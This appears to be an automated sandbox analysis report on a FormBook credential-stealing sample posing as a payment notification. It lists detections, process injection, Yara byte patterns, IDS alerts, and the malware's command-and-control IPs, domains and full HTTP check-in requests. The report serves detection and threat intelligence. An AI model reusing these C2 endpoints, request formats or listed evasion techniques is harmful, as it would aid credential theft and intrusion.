Edit tour

Windows Analysis Report
Payment Notification Confirmation 010_01_2025.exe

Overview

General Information

Sample name:	Payment Notification Confirmation 010_01_2025.exe
Analysis ID:	1589872
MD5:	f6f599bea1bdf13254eae957f1128fa7
SHA1:	260edf43d09957d6fafc40d6691ec8da5e273789
SHA256:	e767eb4506326ba491c2302df16656569c61fa21df995fe6c35c3c1f38b5584d
Tags:	exePaymentuser-cocaman
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Found API chain indicative of sandbox detection

Found direct / indirect Syscall (likely to bypass EDR)

Initial sample is a PE file and has a suspicious name

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

Payment Notification Confirmation 010_01_2025.exe (PID: 1264 cmdline: "C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe" MD5: F6F599BEA1BDF13254EAE957F1128FA7)

svchost.exe (PID: 1792 cmdline: "C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

AYTxDBtmuwEKbeELUJqkhnctN.exe (PID: 8 cmdline: "C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

netbtugc.exe (PID: 6652 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146)

AYTxDBtmuwEKbeELUJqkhnctN.exe (PID: 6956 cmdline: "C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 6012 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.1457779729.00000000003B0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1457779729.00000000003B0000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000005.00000002.3761759858.0000000003630000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.3761759858.0000000003630000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.1458665245.0000000003390000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1458665245.0000000003390000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000005.00000002.3759431434.0000000003240000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.3759431434.0000000003240000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000007.00000002.3761974191.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.3761974191.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x35c6b:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1f30a:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000005.00000002.3761586169.00000000035F0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.3761586169.00000000035F0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.3762066733.0000000002430000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.3762066733.0000000002430000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x991ad5:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x97b174:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.1458731387.00000000033D0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1458731387.00000000033D0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x991ad5:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x97b174:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Click to see the 11 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.svchost.exe.3b0000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.3b0000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.svchost.exe.3b0000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.3b0000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2d063:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x16702:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe", CommandLine: "C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe", CommandLine|base64offset|contains: 6b~'*', Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe", ParentImage: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe, ParentProcessId: 1264, ParentProcessName: Payment Notification Confirmation 010_01_2025.exe, ProcessCommandLine: "C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe", ProcessId: 1792, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe", CommandLine: "C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe", CommandLine|base64offset|contains: 6b~'*', Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe", ParentImage: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe, ParentProcessId: 1264, ParentProcessName: Payment Notification Confirmation 010_01_2025.exe, ProcessCommandLine: "C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe", ProcessId: 1792, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE FormBook CnC Checkin (GET) M5

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-13T09:26:42.307404+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.7	49839	154.215.72.110	80	TCP
2025-01-13T09:27:14.474533+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.7	49979	116.50.37.244	80	TCP
2025-01-13T09:28:36.016917+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.7	49983	85.159.66.93	80	TCP
2025-01-13T09:28:49.369267+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.7	49987	91.195.240.94	80	TCP
2025-01-13T09:29:10.893031+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.7	49991	66.29.149.46	80	TCP
2025-01-13T09:29:24.437117+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.7	49995	195.110.124.133	80	TCP
2025-01-13T09:29:54.438503+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.7	49999	217.196.55.202	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Payment Notification Confirmation 010_01_2025.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://www.goldenjade-travel.com/fo8o/?DZb=zf440xcx6XAL&6d6p=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFxnciuyQt15M5Zq/CPuMEXgodEuvjC2Tprvq68sXKyaNl/eQdY42yXteh	Avira URL Cloud: Label: malware
Source: http://www.elettrosistemista.zip/fo8o/?DZb=zf440xcx6XAL&6d6p=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMMnVmQq+lm2z9nd9BQOLzJZJregrcunvpsiXNjQ3cRjwhNT6H4Su73WUG	Avira URL Cloud: Label: malware
Source: http://www.techchains.info/fo8o/	Avira URL Cloud: Label: malware
Source: http://www.rssnewscast.com/fo8o/?6d6p=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNp8oWpH63NEiVxRUOej85ag7JBXkSrwNx0GMHe1VrOeoqYxhSWqtxVT73&DZb=zf440xcx6XAL	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: Payment Notification Confirmation 010_01_2025.exe	ReversingLabs: Detection: 71%
Source: Payment Notification Confirmation 010_01_2025.exe	Virustotal: Detection: 66%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.3b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.3b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1457779729.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3761759858.0000000003630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1458665245.0000000003390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3759431434.0000000003240000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3761974191.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3761586169.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3762066733.0000000002430000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1458731387.00000000033D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: Payment Notification Confirmation 010_01_2025.exe

Joe Sandbox ML: detected

Source: Payment Notification Confirmation 010_01_2025.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: AYTxDBtmuwEKbeELUJqkhnctN.exe, 00000004.00000002.3759664586.000000000057E000.00000002.00000001.01000000.00000004.sdmp, AYTxDBtmuwEKbeELUJqkhnctN.exe, 00000007.00000002.3759427529.000000000057E000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: wntdll.pdbUGP source: Payment Notification Confirmation 010_01_2025.exe, 00000000.00000003.1303536619.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Payment Notification Confirmation 010_01_2025.exe, 00000000.00000003.1305682299.0000000003B80000.00000004.00001000.00020000.00000000.sdmp, Payment Notification Confirmation 010_01_2025.exe, 00000000.00000003.1308448145.0000000003B80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1367997688.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1458095842.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1365953942.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1458095842.000000000319E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3762610915.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3762610915.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.1458066825.0000000003688000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.1461037729.0000000003831000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Payment Notification Confirmation 010_01_2025.exe, 00000000.00000003.1303536619.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Payment Notification Confirmation 010_01_2025.exe, 00000000.00000003.1305682299.0000000003B80000.00000004.00001000.00020000.00000000.sdmp, Payment Notification Confirmation 010_01_2025.exe, 00000000.00000003.1308448145.0000000003B80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1367997688.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1458095842.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1365953942.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1458095842.000000000319E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000005.00000002.3762610915.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3762610915.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.1458066825.0000000003688000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.1461037729.0000000003831000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000002.1457948459.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1426971457.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, AYTxDBtmuwEKbeELUJqkhnctN.exe, 00000004.00000002.3761144075.0000000000878000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: netbtugc.exe, 00000005.00000002.3760623624.000000000345E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3763664515.000000000400C000.00000004.10000000.00040000.00000000.sdmp, AYTxDBtmuwEKbeELUJqkhnctN.exe, 00000007.00000002.3762597741.000000000356C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.1746896958.0000000011BDC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: netbtugc.exe, 00000005.00000002.3760623624.000000000345E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3763664515.000000000400C000.00000004.10000000.00040000.00000000.sdmp, AYTxDBtmuwEKbeELUJqkhnctN.exe, 00000007.00000002.3762597741.000000000356C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.1746896958.0000000011BDC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000002.1457948459.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1426971457.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, AYTxDBtmuwEKbeELUJqkhnctN.exe, 00000004.00000002.3761144075.0000000000878000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Code function: 0_2_0096C2A2 FindFirstFileExW,	0_2_0096C2A2
Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Code function: 0_2_009A68EE FindFirstFileW,FindClose,	0_2_009A68EE
Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Code function: 0_2_009A698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_009A698F
Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Code function: 0_2_0099D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0099D076
Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Code function: 0_2_0099D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0099D3A9
Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Code function: 0_2_009A9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_009A9642
Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Code function: 0_2_009A979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_009A979D
Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Code function: 0_2_0099DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0099DBBE
Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Code function: 0_2_009A9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_009A9B2B
Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Code function: 0_2_009A5C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_009A5C97
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_0325BAB0 FindFirstFileW,FindNextFileW,FindClose,	5_2_0325BAB0

Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4x nop then xor eax, eax	5_2_03249480
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4x nop then pop edi	5_2_0324DD45
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4x nop then mov ebx, 00000004h	5_2_0382053E

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49839 -> 154.215.72.110:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49979 -> 116.50.37.244:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49995 -> 195.110.124.133:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49983 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49987 -> 91.195.240.94:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49999 -> 217.196.55.202:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49991 -> 66.29.149.46:80

Performs DNS queries to domains with low reputation

Source:

DNS query: www.joyesi.xyz

Source: Joe Sandbox View	IP Address: 91.195.240.94 91.195.240.94
Source: Joe Sandbox View	IP Address: 154.215.72.110 154.215.72.110

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe

Code function: 0_2_009ACE44 InternetReadFile,SetEvent,GetLastError,SetEvent,

0_2_009ACE44

Source: global traffic	HTTP traffic detected: GET /fo8o/?DZb=zf440xcx6XAL&6d6p=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnyPSqftK4e48VmHPHqtN0zR7rhi1sr30t/oMfgteNmFfmnntRnM0qQ0ZY HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.3xfootball.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?DZb=zf440xcx6XAL&6d6p=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFxnciuyQt15M5Zq/CPuMEXgodEuvjC2Tprvq68sXKyaNl/eQdY42yXteh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.goldenjade-travel.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?DZb=zf440xcx6XAL&6d6p=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjNRwjYf1m964qUSTP7WQyE0w3buAATyqoGj3VWMs6RJMKNOUgjB5nLBKL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.magmadokum.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?6d6p=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNp8oWpH63NEiVxRUOej85ag7JBXkSrwNx0GMHe1VrOeoqYxhSWqtxVT73&DZb=zf440xcx6XAL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.rssnewscast.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?6d6p=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5havgW/E7FBnRHSVLxLOmP4JSsfFuCtKITU5HHIETNdwZpVM5nJMc2sOIT&DZb=zf440xcx6XAL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.techchains.infoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
